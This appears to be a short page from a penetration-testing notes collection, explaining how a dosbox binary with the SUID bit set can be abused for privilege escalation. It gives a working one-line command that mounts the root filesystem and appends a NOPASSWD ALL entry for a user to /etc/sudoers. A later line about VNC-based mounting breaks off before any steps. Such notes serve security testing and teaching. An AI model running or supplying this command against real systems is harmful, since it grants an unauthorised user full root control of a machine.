Dosbox

The presence of dosbox with the SUID bit set allows privilege escalation via file write abuse. According to GTFOBins, dosbox can be used to modify arbitrary files when executed as root through SUID.

# Add a user to the sudoers group
LFILE='/etc/sudoers'
dosbox -c 'mount c /' -c "echo x7331 ALL=(ALL) NOPASSWD: ALL >> c:$LFILE" -c exit

If GUI-based access to the target is available (e.g. via VNC) we can mount the filesystem:

PreviousDocker Nexted

Last updated 5 months ago